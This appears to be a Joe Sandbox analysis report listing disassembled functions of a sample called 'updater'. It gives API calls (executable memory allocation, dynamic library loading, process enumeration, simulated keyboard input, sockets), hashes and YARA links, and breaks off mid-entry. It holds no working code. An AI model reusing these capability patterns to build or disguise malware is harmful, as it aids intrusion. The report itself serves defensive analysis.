API String ID: 2574300362-199464113
Opcode ID: c9d591c6f7b99ddfc531e98f503154e44fd97afb4c404b00035dbb78957ce979
Instruction ID: be14bd7804bb4dd8f3dea99f217a1054d7493cab2a13186f282e2e697d9c1d07
Opcode Fuzzy Hash: c9d591c6f7b99ddfc531e98f503154e44fd97afb4c404b00035dbb78957ce979
Instruction Fuzzy Hash: 9ED017B55A0B239FD7209F31E88970AB6E4FF15791F21883AD996E2650EB74C980CA11

Function 017B8D9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,017B9726,00000000,017B9739), ref: 017B8DA3
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 017B8DB4

Strings

kernel32.dll, xrefs: 017B8D9E
GetDiskFreeSpaceExA, xrefs: 017B8DAE

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: f089ec647eb1328595aa713d390e4ee52389967117245dd22e3742b8b0776182
Instruction ID: ae2c84b19694fcc1231f99c3e956f331849917e517646471dcd25c6cc0022f6b
Opcode Fuzzy Hash: f089ec647eb1328595aa713d390e4ee52389967117245dd22e3742b8b0776182
Instruction Fuzzy Hash: 1CD0C7B0A453495FE7209AA954D57D5E65C973C626B00442F75115710EEBF0C4805B51

Function 00C07D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04655e235f90e11e4a47c1b17ec1906b99f2e4d441ef25e46c22001c0410c7a
Instruction ID: f862ca181397168661b9835e6c141a0b9e6c1cf128fba678adfb9a50f038822d
Opcode Fuzzy Hash: d04655e235f90e11e4a47c1b17ec1906b99f2e4d441ef25e46c22001c0410c7a
Instruction Fuzzy Hash: C5C17F74E00216EFCB14CF94C884EAEB7B5FF48714B218598E855EB291DB31EE85CB90

Function 00C2E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C2E7A7
CharLowerBuffW.USER32(?,?), ref: 00C2E7EA

Part of subcall function 00C2DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C2DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C2E9EA
_memmove.LIBCMT ref: 00C2E9FD

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 8b7ed4e1f40cb66eecfa3f8f1003f69c933112c66cfe7b374fa0606fb3e6b5ae
Instruction ID: 2afde1c5133b4d3ab8d014720acc0bf8ee8bfa1c6b2e24f7f871e736c31f5010
Opcode Fuzzy Hash: 8b7ed4e1f40cb66eecfa3f8f1003f69c933112c66cfe7b374fa0606fb3e6b5ae
Instruction Fuzzy Hash: C0C17C716043118FC714DF28D440A6ABBE4FF89714F14896EF899AB352D771EA46CB82

Function 00C2877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C287AD
CoUninitialize.OLE32 ref: 00C287B8

Part of subcall function 00C3DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00C28A0E,?,00000000), ref: 00C3DF71

VariantInit.OLEAUT32(?), ref: 00C287C3
VariantClear.OLEAUT32(?), ref: 00C28A94

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: f0f959f90e84120e46613bf10c42e923c55bb305a76b9d77de028dfe512e8706
Instruction ID: 045a8039a7807ff47dc7b4566e828c33010bcbfc6beb5ece6ba2f0880ebdfe88
Opcode Fuzzy Hash: f0f959f90e84120e46613bf10c42e923c55bb305a76b9d77de028dfe512e8706
Instruction Fuzzy Hash: 68A16975204B119FDB10EF14D481B6AB7E4BF88310F148899F9969B7A2CB70ED44DB92

Function 00C0814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C43C4C,?), ref: 00C08308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C43C4C,?), ref: 00C08320
CLSIDFromProgID.OLE32(?,?,00000000,00C40988,000000FF,?,00000000,00000800,00000000,?,00C43C4C,?), ref: 00C08345
_memcmp.LIBCMT ref: 00C08366

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: dd0e45b8a02038d7c4a1dd55027e304d2dbb474f67f55de29615728322916ed6
Instruction ID: d5f1fb1e190c092b701816c4a5828b1f7604f7c0442fe36414b3bcbb46007004
Opcode Fuzzy Hash: dd0e45b8a02038d7c4a1dd55027e304d2dbb474f67f55de29615728322916ed6
Instruction Fuzzy Hash: 6D813D71A00109EFCB00DFD4C984EEEB7B9FF89315F208558E555AB290DB71AE0ACB60

Function 00C0749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C074AC
SysAllocString.OLEAUT32(00000000), ref: 00C07555
VariantCopy.OLEAUT32 ref: 00C07584
VariantClear.OLEAUT32(?), ref: 00C075AB

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 48638bdbdd06b77795a0b132f363a00c3e871f1363e4d37b9d27b98e7ca953a0
Instruction ID: 4cc181e6d8f8101f1640fa770a287cd9fd73baa27949beaa399c9b3d992068c5
Opcode Fuzzy Hash: 48638bdbdd06b77795a0b132f363a00c3e871f1363e4d37b9d27b98e7ca953a0
Instruction Fuzzy Hash: 74519130A08B019ACB28AF699895B7DB3E4AF45310F30991FF557C72E1EA71A980DB05

Function 017C9ACD Relevance: 6.2, APIs: 4, Instructions: 199libraryloadermemoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 017C9B62
LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 017C9C01
GetProcAddress.KERNEL32(00000000,?), ref: 017C9C65
GetProcAddress.KERNEL32(00000000,?), ref: 017C9C7C

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AddressProc$AllocLibraryLoadVirtual
String ID:
API String ID: 857568384-0
Opcode ID: 89a4ec1228834f0bbd92352ef447eff2c558711b47193206959ad082f3d5fedc
Instruction ID: c483a1e4f37eeb063d7091babae36445cc69743619bf494a252c5f3d64cf1ba5
Opcode Fuzzy Hash: 89a4ec1228834f0bbd92352ef447eff2c558711b47193206959ad082f3d5fedc
Instruction Fuzzy Hash: 1381D071A002299FDB65DF28CC81BD9F7F5EF59714F0582E9EA48A7201D770AE908F90

Function 00C2F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C2F526
Process32FirstW.KERNEL32(00000000,?), ref: 00C2F534

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Process32NextW.KERNEL32(00000000,?), ref: 00C2F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C2F603

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 56fe81850d5cdd782fedc728aa40cfd59cbe1cee40f528da76644e9924d9ce64
Instruction ID: 4a442e1bbb5b4dc5cdf1faf3b3fae27359c67ebf758fea2dd410b02f19aa32fb
Opcode Fuzzy Hash: 56fe81850d5cdd782fedc728aa40cfd59cbe1cee40f528da76644e9924d9ce64
Instruction Fuzzy Hash: BB5149B1104311AFD310EF24D886FABB7E8EF95710F10496DF595962A2EB70AA05CB92

Function 00BD492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BD49C0
__flush.LIBCMT ref: 00BD49E0
__write.LIBCMT ref: 00BD4A13
__flsbuf.LIBCMT ref: 00BD4A41

Part of subcall function 00BD8D58: __getptd_noexit.LIBCMT ref: 00BD8D58

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: eaa83c43b07d5b798e447575cd2735ab84e15d1ba9dbcd9d4bf7751fd6cb6ab6
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: EA419431600606AFDF288FAAC89496FFBE5EF45360B2485BFE85987740F7749D418B44

Function 00C0A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C0A68A
__itow.LIBCMT ref: 00C0A6BB

Part of subcall function 00C0A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C0A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C0A724
__itow.LIBCMT ref: 00C0A77B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 929e0a4c2c822f9d852c8273da6cbad70c718e304067244fbd76c133bbf764b0
Instruction ID: 312eee9ff4ba41726fe848be96fd940b491f8ca5e2a8c127143ae70bafcbdae7
Opcode Fuzzy Hash: 929e0a4c2c822f9d852c8273da6cbad70c718e304067244fbd76c133bbf764b0
Instruction Fuzzy Hash: 6741AF75A00308ABDF10EF58C846FEE7BB9EF49750F004469F915A32C2DB709A45CAA2

Function 00C27095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C270BC
WSAGetLastError.WSOCK32(00000000), ref: 00C270CC

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C27130
WSAGetLastError.WSOCK32(00000000), ref: 00C2713C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 0d26567e4446f19349ad0128f00fc181b4c8e651610c45990e38a0ee9862c604
Instruction ID: 69f7481c45b687cece21a763a5f50375539b4c5fa416fe08b4f2d824ee4399c1
Opcode Fuzzy Hash: 0d26567e4446f19349ad0128f00fc181b4c8e651610c45990e38a0ee9862c604
Instruction Fuzzy Hash: AA418D756402106FEB24AF24DC86FBE77E4AF04B14F148598FA59AB3D3DBB09D009B91

Function 00C26B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C40980), ref: 00C26B92
_strlen.LIBCMT ref: 00C26BC4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: da7bfa78cc2352c7e3f2f936f8ce2408f20335361c5512e37f741188a10205a4
Instruction ID: 19cad2a7bff9fb30755f7b050e544ae4391e6cf0b1efd39d60dfacc95615f5fb
Opcode Fuzzy Hash: da7bfa78cc2352c7e3f2f936f8ce2408f20335361c5512e37f741188a10205a4
Instruction Fuzzy Hash: 6841B571600118ABCB14FB64EC95FBEB3E9EF54310F148199F91A9B2D2DB30AE41D7A0

Function 017BABA9 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 017BAC58
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 017BAC74
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 017BACEB
VariantClear.OLEAUT32(?), ref: 017BAD14

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
Instruction ID: 1b9748c6ae677ae387a37d1c5845d5a5c8a43dab512f62064f173765f441eba7
Opcode Fuzzy Hash: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
Instruction Fuzzy Hash: AA41EA75A0161E9FCB62EB58C8D4BC9F3BDAF58214F0042E5E659A7215DB30AFC18F50

Function 00C38E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C38F03

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 6d46b23973006a8dd10d7281a8f495bf8931f26d5e969b072510af469ef8a867
Instruction ID: 7f1ac62fc412e28f961eae0866ea7ad0e3a5b66e9782742f9173844343438190
Opcode Fuzzy Hash: 6d46b23973006a8dd10d7281a8f495bf8931f26d5e969b072510af469ef8a867
Instruction Fuzzy Hash: 5B31D438660308AFEF209A98CC45FAC37A6EB09320F244501FA25D61E1CF75DA58CA51

Function 017B76B5 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 017B76D1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 017B76F5
GetModuleFileNameA.KERNEL32(00BB0000,?,00000105), ref: 017B7710
LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 017B77B4

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: d184f94e1e3152c5d3ec7cd88f443a04bcde814091386ff6ca63bd3fb8d9c34e
Instruction ID: 97993af72f946539e074ae6cae1acb86d04ffbd5ec29247714b787e779232080
Opcode Fuzzy Hash: d184f94e1e3152c5d3ec7cd88f443a04bcde814091386ff6ca63bd3fb8d9c34e
Instruction Fuzzy Hash: F141E871A0525DAFDB25DB68C8C8BDEF7B8AB58300F1440E5A508E7245D7749F848F51

Function 017B76B3 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 017B76D1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 017B76F5
GetModuleFileNameA.KERNEL32(00BB0000,?,00000105), ref: 017B7710
LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 017B77B4

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 4aeffb4814ebd7f958c902e5c7d75241cd4e43579c56ca6314f29e12f2adc331
Instruction ID: 1d93bda8d047e4555266dfe77d1858ee1ef4533dd0b3123f7649d9eb02e89fb9
Opcode Fuzzy Hash: 4aeffb4814ebd7f958c902e5c7d75241cd4e43579c56ca6314f29e12f2adc331
Instruction Fuzzy Hash: 2A41E770A0525DAFDB25DB68C8C8BDEF7F8AB58304F1440E6A908E7245E7749F848F51

Function 00C3B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(01741240,?), ref: 00C3B1D2
GetWindowRect.USER32(?,?), ref: 00C3B248
PtInRect.USER32(?,?,00C3C6BC), ref: 00C3B258
MessageBeep.USER32(00000000), ref: 00C3B2C9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 07341c048243b64c848b1b76264828f2f101fd16389ac8e8f8d29ad960a0b97b
Instruction ID: d250a09c0ab9551a3aa40d225390ba8e0bb719db985b7d541c3951558463c2ef
Opcode Fuzzy Hash: 07341c048243b64c848b1b76264828f2f101fd16389ac8e8f8d29ad960a0b97b
Instruction Fuzzy Hash: F0416D30A14119DFDB11CF99C884BAE7BF5FF89350F1882A9EA289B251D732AD41CF51

Function 00C112D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C11326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00C11342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C113A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C113FA

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 09c44fa82b28b484d82dd81c19d715b31c1d2bb04ccf3440d739051f6f97705b
Instruction ID: 2871e35217e5c5260d0c46dc90cace2945689c3d7da95ff8534af7b8585a6463
Opcode Fuzzy Hash: 09c44fa82b28b484d82dd81c19d715b31c1d2bb04ccf3440d739051f6f97705b
Instruction Fuzzy Hash: E1314D30944208AEFF30C6258C057FDBBA5AB47310F9C421AEAB0525E9D37C8AC1BB95

Function 00C11410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00C11465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C11481
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C114E0
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00C11532

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8b6629060e70e520adff82bf488b87af968656bdc4ca0990574c00c5c599e530
Instruction ID: 47855fd09e17ee978b4a8598a47cc50a5053d2dd33c43b570675105d4da8e5fa
Opcode Fuzzy Hash: 8b6629060e70e520adff82bf488b87af968656bdc4ca0990574c00c5c599e530
Instruction Fuzzy Hash: 08315E309402185EFF34CA658C047FEBB66AB87710F1C831AEAA1521D1C37C8AD1BBA1

Function 017B87CD Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

